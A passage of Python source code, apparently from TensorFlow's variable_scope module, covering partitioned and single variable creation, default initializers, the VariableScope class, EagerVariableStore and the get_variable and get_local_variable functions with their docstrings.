If initializer is `None` (the default), the default initializer passed in
the constructor is used. If that one is `None` too, we use a new
`glorot_uniform_initializer`. If initializer is a Tensor, we use
it as a value and derive the shape from the initializer.
If the initializer is a callable, then it will be called for each
shard. Otherwise the initializer should match the shape of the entire
sharded Variable, and it will be sliced accordingly for each shard.
Some useful partitioners are available. See, e.g.,
`variable_axis_size_partitioner` and `min_max_variable_partitioner`.
Args:
name: the name of the new or existing sharded variable.
partitioner: Optional callable that accepts a fully defined `TensorShape`
and `dtype` of the Variable to be created, and returns a list of
partitions for each axis (currently only one axis can be partitioned).
shape: shape of the new or existing sharded variable.
dtype: type of the new or existing sharded variable (defaults to
`DT_FLOAT`).
initializer: initializer for the sharded variable.
regularizer: a (Tensor -> Tensor or None) function; the result of applying
it on a newly created variable will be added to the collection
GraphKeys.REGULARIZATION_LOSSES and can be used for regularization.
reuse: a Boolean, None, or tf.AUTO_REUSE. Controls reuse or creation of
variables.
trainable: If `True` also add the variable to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).
collections: List of graph collections keys to add the Variable to.
Defaults to `[GraphKeys.GLOBAL_VARIABLES]` (see `tf.Variable`).
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's
device. If not `None`, caches on another device. Typical use is to
cache on the device where the Ops using the Variable reside, to
deduplicate copying through `Switch` and other conditional statements.
validate_shape: If False, allows the variable to be initialized with a
value of unknown shape. If True, the default, the shape of initial_value
must be known.
use_resource: If False, creates a regular Variable. If True, creates an
experimental ResourceVariable which has well-defined semantics. Defaults
to False (will later change to True).
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value (which must have
the same shape). Constraints are not safe to use when doing asynchronous
distributed training.
synchronization: Indicates when a distributed a variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses when to
synchronize. If `synchronization` is set to `ON_READ`, `trainable` must
not be set to `True`.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
Returns:
A `PartitionedVariable` object.
Raises:
ValueError: when creating a new variable and shape is not declared,
when reusing a variable and specifying a conflicting shape,
when violating reuse during variable creation, or if an existing
sharded variable exists for the given name but with different sharding.
"""
initializing_from_value = initializer is not None and isinstance(
initializer, ops.Tensor)
if name in self._vars:
raise ValueError(
"A partitioner was provided, but an unpartitioned version of the "
"variable was found: %s. Perhaps a variable of the same name was "
"already created without partitioning?" % name)
shape = tensor_shape.as_shape(shape)
if initializing_from_value:
shape = shape.merge_with(initializer.get_shape())
partitions = None
if not reuse or partitioner:
partitions = _call_partitioner(partitioner, shape, dtype)
if name in self._partitioned_vars:
if reuse is False:
raise ValueError(
"Partitioned variable with name %s already exists. Did you mean to "
"set reuse=True or reuse=tf.AUTO_REUSE in VarScope?" % name)
existing_var = self._partitioned_vars[name]
if not shape.is_compatible_with(existing_var.get_shape()):
raise ValueError(
"Trying to reuse partitioned variable %s, but specified shape %s "
"and found shape %s." % (name, shape, existing_var.get_shape()))
if not dtype.is_compatible_with(existing_var.dtype):
raise ValueError(
"Trying to reuse partitioned variable %s, but specified dtype %s "
"and found dtype %s." % (name, dtype.name, existing_var.dtype.name))
# pylint: disable=protected-access
if (partitions is not None and
existing_var._get_partitions() != partitions):
raise ValueError(
"Trying to reuse partitioned variable %s, but specified partitions "
"%s and found partitions %s." %
(name, partitions, existing_var._get_partitions()))
# pylint: enable=protected-access
return existing_var
if reuse is True:
raise ValueError("PartitionedVariable %s does not exist, or was not "
"created with tf.get_variable(). Did you mean to set "
"reuse=False or reuse=tf.AUTO_REUSE in VarScope?" % name)
slice_dim, num_slices = _get_slice_dim_and_num_slices(partitions)
if "%s/part_0" % name in self._vars:
if "%s/part_%d" % (name, num_slices - 1) not in self._vars:
raise ValueError(
"Partitioner returned a different partitioning than what was "
"already found. Partitioner returned %d shards, and shard "
"%s/part_0 was found, but %s/part_%d was not." %
(num_slices, name, name, num_slices - 1))
if "%s/part_%d" % (name, num_slices) in self._vars:
raise ValueError(
"Partitioner returned a different partitioning than what was "
"already found. Partitioner returned %d shards, and shard "
"%s/part_0 was found, but so was the extra shard %s/part_%d." %
(num_slices, name, name, num_slices))
vs = []
for i, (var_offset, var_shape) in enumerate(
_iter_slices(shape.as_list(), num_slices, slice_dim)):
partition_info = _PartitionInfo(
full_shape=shape.as_list(), var_offset=var_offset)
var_full_name = "%s/part_%d" % (name, i)
with ops.name_scope(var_full_name + "/PartitionedInitializer"):
# Create the tensor to initialize the variable with default value.
if initializer is None:
init, initializing_from_value = self._get_default_initializer(
name=name, shape=shape, dtype=dtype)
if initializing_from_value:
init_shape = None
else:
init_shape = var_shape
elif callable(initializer):
init = initializer
init_shape = var_shape
elif isinstance(initializer, ops.Tensor):
init = array_ops.slice(initializer, var_offset, var_shape)
# Use the dtype of the given tensor.
dtype = init.dtype.base_dtype
init_shape = None
else:
init = ops.convert_to_tensor(initializer, dtype=dtype)
init = array_ops.slice(init, var_offset, var_shape)
init_shape = None
with ops.name_scope(None):
var = self._get_single_variable(
name=var_full_name,
shape=init_shape,
dtype=dtype,
initializer=init,
partition_info=partition_info,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
# pylint: disable=protected-access
var._set_save_slice_info(
variables.Variable.SaveSliceInfo(name, shape.as_list(), var_offset,
var_shape))
vs.append(var)
# pylint: enable=protected-access
partitioned_var = variables.PartitionedVariable(
name=name,
shape=shape,
dtype=dtype,
variable_list=vs,
partitions=partitions)
if not context.executing_eagerly() or self._store_eager_variables:
self._partitioned_vars[name] = partitioned_var
return partitioned_var
def _get_single_variable(self,
name,
shape=None,
dtype=dtypes.float32,
initializer=None,
regularizer=None,
partition_info=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
validate_shape=True,
use_resource=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Get or create a single Variable (e.g.
a shard or entire variable).
See the documentation of get_variable above (ignore partitioning components)
for details.
Args:
name: see get_variable.
shape: see get_variable.
dtype: see get_variable.
initializer: see get_variable.
regularizer: see get_variable.
partition_info: _PartitionInfo object.
reuse: see get_variable.
trainable: see get_variable.
collections: see get_variable.
caching_device: see get_variable.
validate_shape: see get_variable.
use_resource: see get_variable.
constraint: see get_variable.
synchronization: see get_variable.
aggregation: see get_variable.
Returns:
A Variable. See documentation of get_variable above.
Raises:
ValueError: See documentation of get_variable above.
"""
# Set to true if initializer is a constant.
initializing_from_value = False
if initializer is not None and not callable(initializer):
initializing_from_value = True
if shape is not None and initializing_from_value:
raise ValueError("If initializer is a constant, do not specify shape.")
dtype = dtypes.as_dtype(dtype)
shape = tensor_shape.as_shape(shape)
if name in self._vars:
# Here we handle the case when returning an existing variable.
if reuse is False:
var = self._vars[name]
err_msg = ("Variable %s already exists, disallowed."
" Did you mean to set reuse=True or "
"reuse=tf.AUTO_REUSE in VarScope?" % name)
# ResourceVariables don't have an op associated with so no traceback
if isinstance(var, resource_variable_ops.ResourceVariable):
raise ValueError(err_msg)
tb = var.op.traceback[::-1]
# Throw away internal tf entries and only take a few lines. In some
# cases the traceback can be longer (e.g. if someone uses factory
# functions to create variables) so we take more than needed in the
# default case.
tb = [x for x in tb if "tensorflow/python" not in x[0]][:5]
raise ValueError("%s Originally defined at:\n\n%s" %
(err_msg, "".join(traceback.format_list(tb))))
found_var = self._vars[name]
if not shape.is_compatible_with(found_var.get_shape()):
raise ValueError("Trying to share variable %s, but specified shape %s"
" and found shape %s." %
(name, shape, found_var.get_shape()))
if not dtype.is_compatible_with(found_var.dtype):
dtype_str = dtype.name
found_type_str = found_var.dtype.name
raise ValueError("Trying to share variable %s, but specified dtype %s"
" and found dtype %s." %
(name, dtype_str, found_type_str))
return found_var
# The code below handles only the case of creating a new variable.
if reuse is True:
raise ValueError("Variable %s does not exist, or was not created with "
"tf.get_variable(). Did you mean to set "
"reuse=tf.AUTO_REUSE in VarScope?" % name)
# Create the tensor to initialize the variable with default value.
if initializer is None:
initializer, initializing_from_value = self._get_default_initializer(
name=name, shape=shape, dtype=dtype)
# Enter an init scope when creating the initializer.
with ops.init_scope():
if initializing_from_value:
init_val = initializer
variable_dtype = None
else:
# Instantiate initializer if provided initializer is a type object.
if tf_inspect.isclass(initializer):
initializer = initializer()
if shape is not None and shape.is_fully_defined():
init_val = lambda: initializer( # pylint: disable=g-long-lambda
shape.as_list(),
dtype=dtype,
partition_info=partition_info)
variable_dtype = dtype.base_dtype
elif len(tf_inspect.getargspec(initializer).args) == len(
tf_inspect.getargspec(initializer).defaults or []):
init_val = initializer
variable_dtype = None
else:
raise ValueError("The initializer passed is not valid. It should "
"be a callable with no arguments and the "
"shape should not be provided or an instance of "
"`tf.keras.initializers.*' and `shape` should be "
"fully defined.")
# Create the variable.
if use_resource is None:
# Set the default value if unspecified.
use_resource = _DEFAULT_USE_RESOURCE
v = variables.VariableV1(
initial_value=init_val,
name=name,
trainable=trainable,
collections=collections,
caching_device=caching_device,
dtype=variable_dtype,
validate_shape=validate_shape,
constraint=constraint,
use_resource=use_resource,
synchronization=synchronization,
aggregation=aggregation)
if context.executing_eagerly() and self._store_eager_variables:
if collections:
ops.add_to_collections(collections, v)
else:
ops.add_to_collection(ops.GraphKeys.GLOBAL_VARIABLES, v)
if trainable:
ops.add_to_collection(ops.GraphKeys.TRAINABLE_VARIABLES, v)
if not context.executing_eagerly() or self._store_eager_variables:
# In eager mode we do not want to keep default references to Variable
# objects as this will prevent their memory from being released.
self._vars[name] = v
logging.vlog(1, "Created variable %s with shape %s and init %s", v.name,
format(shape), initializer)
# Run the regularizer if requested and save the resulting loss.
if regularizer:
with ops.colocate_with(v):
with ops.name_scope(name + "/Regularizer/"):
with ops.init_scope():
loss = regularizer(v)
if loss is not None:
if context.executing_eagerly():
v_name = "v_%s" % type(v)
loss_name = "loss_%s" % type(loss)
else:
v_name = v.name
loss_name = loss.name
logging.vlog(
1, "Applied regularizer to %s and added the result %s "
"to REGULARIZATION_LOSSES.", v_name, loss_name)
ops.add_to_collection(ops.GraphKeys.REGULARIZATION_LOSSES, loss)
return v
# Initialize variable when no initializer provided
def _get_default_initializer(self, name, shape=None, dtype=dtypes.float32):
"""Provide a default initializer and a corresponding value.
Args:
name: see get_variable.
shape: see get_variable.
dtype: see get_variable.
Returns:
initializer and initializing_from_value. See get_variable above.
Raises:
ValueError: When giving unsupported dtype.
"""
del shape
# If dtype is DT_FLOAT, provide a uniform unit scaling initializer
if dtype.is_floating:
initializer = init_ops.glorot_uniform_initializer()
initializing_from_value = False
# If dtype is DT_INT/DT_UINT, provide a default value `zero`
# If dtype is DT_BOOL, provide a default value `FALSE`
elif (dtype.is_integer or dtype.is_unsigned or dtype.is_bool or
dtype == dtypes.string):
initializer = init_ops.zeros_initializer()
initializing_from_value = False
# NOTES:Do we need to support for handling DT_STRING and DT_COMPLEX here?
else:
raise ValueError("An initializer for variable %s of %s is required" %
(name, dtype.base_dtype))
return initializer, initializing_from_value
# To stop regularization, use this regularizer
@tf_export(v1=["no_regularizer"])
def no_regularizer(_):
"""Use this function to prevent regularization of variables."""
return None
# TODO(alive): support caching devices and partitioned variables in Eager mode.
@tf_export(v1=["VariableScope"])
class VariableScope(object):
"""Variable scope object to carry defaults to provide to `get_variable`.
Many of the arguments we need for `get_variable` in a variable store are most
easily handled with a context. This object is used for the defaults.
Attributes:
name: name of the current scope, used as prefix in get_variable.
initializer: default initializer passed to get_variable.
regularizer: default regularizer passed to get_variable.
reuse: Boolean, None, or tf.compat.v1.AUTO_REUSE, setting the reuse in
get_variable. When eager execution is enabled this argument is always
forced to be False.
caching_device: string, callable, or None: the caching device passed to
get_variable.
partitioner: callable or `None`: the partitioner passed to `get_variable`.
custom_getter: default custom getter passed to get_variable.
name_scope: The name passed to `tf.name_scope`.
dtype: default type passed to get_variable (defaults to DT_FLOAT).
use_resource: if False, create a normal Variable; if True create an
experimental ResourceVariable with well-defined semantics. Defaults to
False (will later change to True). When eager execution is enabled this
argument is always forced to be True.
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value (which must have
the same shape). Constraints are not safe to use when doing asynchronous
distributed training.
"""
def __init__(self,
reuse,
name="",
initializer=None,
regularizer=None,
caching_device=None,
partitioner=None,
custom_getter=None,
name_scope="",
dtype=dtypes.float32,
use_resource=None,
constraint=None):
"""Creates a new VariableScope with the given properties."""
self._name = name
self._initializer = initializer
self._regularizer = regularizer
self._reuse = reuse
self._caching_device = caching_device
self._partitioner = partitioner
self._custom_getter = custom_getter
self._name_scope = name_scope
self._dtype = dtype
self._use_resource = use_resource
self._constraint = constraint
if context.executing_eagerly():
if self._caching_device is not None:
raise NotImplementedError("Caching devices is not yet supported "
"when eager execution is enabled.")
self._reuse = AUTO_REUSE
self._use_resource = True
@property
def name(self):
return self._name
@property
def original_name_scope(self):
return self._name_scope
@property
def reuse(self):
return self._reuse
@property
def initializer(self):
return self._initializer
@property
def dtype(self):
return self._dtype
@property
def use_resource(self):
return self._use_resource
@property
def regularizer(self):
return self._regularizer
@property
def caching_device(self):
return self._caching_device
@property
def partitioner(self):
return self._partitioner
@property
def custom_getter(self):
return self._custom_getter
@property
def constraint(self):
return self._constraint
def reuse_variables(self):
"""Reuse variables in this scope."""
self._reuse = True
def set_initializer(self, initializer):
"""Set initializer for this scope."""
self._initializer = initializer
def set_dtype(self, dtype):
"""Set data type for this scope."""
self._dtype = dtype
def set_use_resource(self, use_resource):
"""Sets whether to use ResourceVariables for this scope."""
if context.executing_eagerly() and not use_resource:
raise ValueError("When eager execution is enabled, "
"use_resource cannot be set to false.")
self._use_resource = use_resource
def set_regularizer(self, regularizer):
"""Set regularizer for this scope."""
self._regularizer = regularizer
def set_caching_device(self, caching_device):
"""Set caching_device for this scope."""
if context.executing_eagerly():
raise NotImplementedError("Caching devices are not yet supported "
"when eager execution is enabled.")
self._caching_device = caching_device
def set_partitioner(self, partitioner):
"""Set partitioner for this scope."""
self._partitioner = partitioner
def set_custom_getter(self, custom_getter):
"""Set custom getter for this scope."""
self._custom_getter = custom_getter
def get_collection(self, name):
"""Get this scope's variables."""
scope = self._name + "/" if self._name else ""
return ops.get_collection(name, scope)
def trainable_variables(self):
"""Get this scope's trainable variables."""
return self.get_collection(ops.GraphKeys.TRAINABLE_VARIABLES)
def global_variables(self):
"""Get this scope's global variables."""
return self.get_collection(ops.GraphKeys.GLOBAL_VARIABLES)
def local_variables(self):
"""Get this scope's local variables."""
return self.get_collection(ops.GraphKeys.LOCAL_VARIABLES)
def get_variable(self,
var_store,
name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
custom_getter=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Gets an existing variable with this name or create a new one."""
if regularizer is None:
regularizer = self._regularizer
if caching_device is None:
caching_device = self._caching_device
if partitioner is None:
partitioner = self._partitioner
if custom_getter is None:
custom_getter = self._custom_getter
if context.executing_eagerly():
reuse = False
use_resource = True
else:
if reuse is None:
reuse = self._reuse
if use_resource is None:
use_resource = self._use_resource
full_name = self.name + "/" + name if self.name else name
# Variable names only depend on variable_scope (full_name here),
# not name_scope, so we reset it below for the time of variable creation.
with ops.name_scope(None):
# Check that `initializer` dtype and `dtype` are consistent before
# replacing them with defaults.
if (dtype is not None and initializer is not None and
not callable(initializer)):
init_dtype = ops.convert_to_tensor(initializer).dtype.base_dtype
if init_dtype != dtype:
raise ValueError("Initializer type '%s' and explicit dtype '%s' "
"don't match." % (init_dtype, dtype))
if initializer is None:
initializer = self._initializer
if constraint is None:
constraint = self._constraint
if dtype is None:
dtype = self._dtype
return var_store.get_variable(
full_name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
custom_getter=custom_getter,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
def _get_partitioned_variable(self,
var_store,
name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Gets an existing variable with this name or create a new one."""
if initializer is None:
initializer = self._initializer
if regularizer is None:
regularizer = self._regularizer
if constraint is None:
constraint = self._constraint
if caching_device is None:
caching_device = self._caching_device
if partitioner is None:
partitioner = self._partitioner
if dtype is None:
dtype = self._dtype
if use_resource is None:
use_resource = self._use_resource
if self._custom_getter is not None:
raise ValueError(
"Private access to _get_partitioned_variable is not allowed when "
"a custom getter is set. Current custom getter: %s. "
"It is likely that you're using create_partitioned_variables. "
"If so, consider instead using get_variable with a non-empty "
"partitioner parameter instead." % self._custom_getter)
if partitioner is None:
raise ValueError("No partitioner was specified")
# This allows the variable scope name to be used as the variable name if
# this function is invoked with an empty name arg, for backward
# compatibility with create_partitioned_variables().
full_name_list = []
if self.name:
full_name_list.append(self.name)
if name:
full_name_list.append(name)
full_name = "/".join(full_name_list)
# Variable names only depend on variable_scope (full_name here),
# not name_scope, so we reset it below for the time of variable creation.
with ops.name_scope(None):
# pylint: disable=protected-access
return var_store._get_partitioned_variable(
full_name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=self.reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
# pylint: enable=protected-access
_VARSTORE_KEY = ("__variable_store",)
_VARSCOPESTORE_KEY = ("__varscope",)
class _VariableScopeStore(threading.local):
"""A thread local store for the current variable scope and scope counts."""
def __init__(self):
super(_VariableScopeStore, self).__init__()
self.current_scope = VariableScope(False)
self.variable_scopes_count = {}
def open_variable_scope(self, scope_name):
if scope_name in self.variable_scopes_count:
self.variable_scopes_count[scope_name] += 1
else:
self.variable_scopes_count[scope_name] = 1
def close_variable_subscopes(self, scope_name):
for k in list(self.variable_scopes_count.keys()):
if scope_name is None or k.startswith(scope_name + "/"):
self.variable_scopes_count[k] = 0
def variable_scope_count(self, scope_name):
return self.variable_scopes_count.get(scope_name, 0)
def get_variable_scope_store():
"""Returns the variable scope store for current thread."""
scope_store = ops.get_collection(_VARSCOPESTORE_KEY)
if not scope_store:
scope_store = _VariableScopeStore()
ops.add_to_collection(_VARSCOPESTORE_KEY, scope_store)
else:
scope_store = scope_store[0]
return scope_store
@tf_export(v1=["get_variable_scope"])
def get_variable_scope():
"""Returns the current variable scope."""
return get_variable_scope_store().current_scope
def _get_default_variable_store():
store = ops.get_collection(_VARSTORE_KEY)
if store:
return store[0]
store = _VariableStore()
ops.add_to_collection(_VARSTORE_KEY, store)
return store
@tf_contextlib.contextmanager
def with_variable_store(store):
store_collection = ops.get_collection_ref(_VARSTORE_KEY)
old = list(store_collection)
store_collection[:] = [store]
try:
yield
finally:
store_collection[:] = old
class EagerVariableStore(object):
"""Wrapper allowing functional layers to be used with eager execution.
When eager execution is enabled Variables get deleted when they go out of
scope, and are not stored in global collections by default. A lot of code
(mostly the functional layers in tf.layers) assumes that variables are kept in
a global list.
EagerVariableStore can be used in conjunction with this code to make it
eager-friendly. For example, to create a dense layer, use:
```
container = tfe.EagerVariableStore()
for input in dataset_iterator:
with container.as_default():
x = tf.compat.v1.layers.dense(input, name="l1")
print(container.variables) # Should print the variables used in the layer.
```
"""
def __init__(self, store=None):
if store is not None:
if not store._store_eager_variables: # pylint: disable=protected-access
raise ValueError("Cannot construct EagerVariableStore from a "
"VariableStore object that does not hold eager "
"variables.")
self._store = store
else:
self._store = _VariableStore()
self._store._store_eager_variables = True # pylint: disable=protected-access
def as_default(self):
return with_variable_store(self._store)
def variables(self):
return sorted(self._store._vars.values(), key=lambda x: x.name) # pylint: disable=protected-access
def trainable_variables(self):
# pylint: disable=protected-access
return sorted([x for x in self._store._vars.values() if x.trainable],
key=lambda x: x.name)
# pylint: enable=protected-access
def non_trainable_variables(self):
# pylint: disable=protected-access
return sorted([x for x in self._store._vars.values() if not x.trainable],
key=lambda x: x.name)
# pylint: enable=protected-access
def copy(self):
"""Copy this variable store and all of its contents.
Variables contained in this store will be copied over to the new variable
store, meaning that they can be modified without affecting the variables in
this store.
Returns:
A new EagerVariableStore instance containing copied variables.
"""
# pylint: disable=protected-access
new_store = EagerVariableStore()
for key, var in iteritems(self._store._vars):
# Strip device out of variable name.
try:
index = var.name.index(":")
except ValueError:
stripped_var_name = var.name
else:
stripped_var_name = var.name[:index]
# Create new variable with same value, name, and "trainable" flag.
new_var = resource_variable_ops.ResourceVariable(
var.read_value(), name=stripped_var_name, trainable=var.trainable)
new_store._store._vars[key] = new_var
return new_store
# pylint: enable=protected-access
# The argument list for get_variable must match arguments to get_local_variable.
# So, if you are updating the arguments, also update arguments to
# get_local_variable below.
@tf_export(v1=["get_variable"])
def get_variable(name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
custom_getter=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
return get_variable_scope().get_variable(
_get_default_variable_store(),
name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
custom_getter=custom_getter,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
get_variable_or_local_docstring = ("""%s
%sThis function prefixes the name with the current variable scope
and performs reuse checks. See the
[Variable Scope How To](https://tensorflow.org/guide/variables)
for an extensive description of how reusing works. Here is a basic example:
```python
def foo():
with tf.variable_scope("foo", reuse=tf.AUTO_REUSE):
v = tf.get_variable("v", [1])
return v
v1 = foo() # Creates v.
v2 = foo() # Gets the same, existing v.
assert v1 == v2
```
If initializer is `None` (the default), the default initializer passed in
the variable scope will be used. If that one is `None` too, a
`glorot_uniform_initializer` will be used. The initializer can also be
a Tensor, in which case the variable is initialized to this value and shape.
Similarly, if the regularizer is `None` (the default), the default regularizer
passed in the variable scope will be used (if that is `None` too,
then by default no regularization is performed).
If a partitioner is provided, a `PartitionedVariable` is returned.
Accessing this object as a `Tensor` returns the shards concatenated along
the partition axis.
Some useful partitioners are available. See, e.g.,
`variable_axis_size_partitioner` and `min_max_variable_partitioner`.
Args:
name: The name of the new or existing variable.
shape: Shape of the new or existing variable.
dtype: Type of the new or existing variable (defaults to `DT_FLOAT`).
initializer: Initializer for the variable if one is created. Can either be
an initializer object or a Tensor. If it's a Tensor, its shape must be known
unless validate_shape is False.
regularizer: A (Tensor -> Tensor or None) function; the result of
applying it on a newly created variable will be added to the collection
`tf.GraphKeys.REGULARIZATION_LOSSES` and can be used for regularization.
%scollections: List of graph collections keys to add the Variable to.
Defaults to `[%s]` (see `tf.Variable`).
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's
device. If not `None`, caches on another device. Typical use is to
cache on the device where the Ops using the Variable reside, to
deduplicate copying through `Switch` and other conditional statements.
partitioner: Optional callable that accepts a fully defined `TensorShape`
and `dtype` of the Variable to be created, and returns a list of
partitions for each axis (currently only one axis can be partitioned).
validate_shape: If False, allows the variable to be initialized with a
value of unknown shape. If True, the default, the shape of initial_value
must be known. For this to be used the initializer must be a Tensor and
not an initializer object.
use_resource: If False, creates a regular Variable. If true, creates an
experimental ResourceVariable instead with well-defined semantics.
Defaults to False (will later change to True). When eager execution is
enabled this argument is always forced to be True.
custom_getter: Callable that takes as a first argument the true getter, and
allows overwriting the internal get_variable method.
The signature of `custom_getter` should match that of this method,
but the most future-proof version will allow for changes:
`def custom_getter(getter, *args, **kwargs)`. Direct access to
all `get_variable` parameters is also allowed:
`def custom_getter(getter, name, *args, **kwargs)`. A simple identity
custom getter that simply creates variables with modified names is:
```python
def custom_getter(getter, name, *args, **kwargs):
return getter(name + '_suffix', *args, **kwargs)
```
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value
(which must have the same shape). Constraints are not safe to
use when doing asynchronous distributed training.
synchronization: Indicates when a distributed a variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses
when to synchronize.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
Returns:
The created or existing `Variable` (or `PartitionedVariable`, if a
partitioner was used).
Raises:
ValueError: when creating a new variable and shape is not declared,
when violating reuse during variable creation, or when `initializer` dtype
and `dtype` don't match. Reuse is set inside `variable_scope`.
""")
get_variable.__doc__ = get_variable_or_local_docstring % (
"Gets an existing variable with these parameters or create a new one.", "",
"trainable: If `True` also add the variable to the graph collection\n"
" `GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).\n ",
"GraphKeys.GLOBAL_VARIABLES")
# The argument list for get_local_variable must match arguments to get_variable.
# So, if you are updating the arguments, also update arguments to get_variable.
@tf_export(v1=["get_local_variable"])
def get_local_variable( # pylint: disable=missing-docstring
name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
trainable=False, # pylint: disable=unused-argument
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
custom_getter=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
if collections:
collections += [ops.GraphKeys.LOCAL_VARIABLES]
else:
collections = [ops.GraphKeys.LOCAL_VARIABLES]
return get_variable(
name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
trainable=False,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
synchronization=synchronization,
aggregation=aggregation,
custom_getter=custom_getter,
constraint=constraint)
get_local_variable.__doc__ = get_variable_or_local_docstring % (
"Gets an existing *local* variable or creates a new one.",
"Behavior is the same as in `get_variable`, except that variables are\n"
"added to the `LOCAL_VARIABLES` collection and `trainable` is set to\n"
"`False`.\n", "", "GraphKeys.LOCAL_VARIABLES")
def _get_partitioned_variable(name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
trainable=True,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Gets or creates a sharded variable list with these parameters.
The `partitioner` must be a callable that accepts a fully defined
`TensorShape` and returns a sequence of integers (the `partitions`).
These integers describe how to partition the given sharded `Variable`
along the given dimension. That is, `partitions[1] = 3` means split
the `Variable` into 3 shards along dimension 1. Currently, sharding along
only one axis is supported.
If the list of variables with the given name (prefix) is already stored,
we return the stored variables. Otherwise, we create a new one.
If initializer is `None` (the default), the default initializer passed in
the constructor is used. If that one is `None` too, we use a new
`glorot_uniform_initializer`. If initializer is a Tensor, we use
it as a value and derive the shape from the initializer.
If the initializer is a callable, then it will be called for each
shard. Otherwise the initializer should match the shape of the entire
sharded Variable, and it will be sliced accordingly for each shard.
Some useful partitioners are available. See, e.g.,
`variable_axis_size_partitioner` and `min_max_variable_partitioner`.
Args:
name: The name of the new or existing variable.
shape: Shape of the new or existing variable.
dtype: Type of the new or existing variable (defaults to `DT_FLOAT`).
initializer: Initializer for the variable if one is created.
regularizer: A (Tensor -> Tensor or None) function; the result of applying
it on a newly created variable will be added to the collection
GraphKeys.REGULARIZATION_LOSSES and can be used for regularization.
trainable: If `True` also add the variable to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).
collections: List of graph collections keys to add the Variable to. Defaults
to `[GraphKeys.GLOBAL_VARIABLES]` (see `tf.Variable`).
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's device.
If not `None`, caches on another device. Typical use is to cache on the
device where the Ops using the Variable reside, to deduplicate copying
through `Switch` and other conditional statements.
partitioner: Optional callable that accepts a fully defined `TensorShape`
and `dtype` of the Variable to be created, and returns a list of
partitions for each axis (currently only one axis can be partitioned).
validate_shape: If False, allows the variable to be initialized with a value
of unknown shape. If True, the default, the shape of initial_value must be
known.
use_resource: If False, creates a regular Variable. If True, creates an
experimental ResourceVariable instead which has well-defined semantics.
Defaults to False (will later change to True).
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value (which must have
the same shape). Constraints are not safe to use when doing asynchronous
distributed training.
synchronization: Indicates when a distributed a variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses when to synchronize.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
Returns:
A tuple `(shards, partitions)` where `shards` is the list of `Variable`
shards and `partitions` is the output of the partitioner on the input
shape.
Raises:
ValueError: when creating a new variable and shape is not declared,
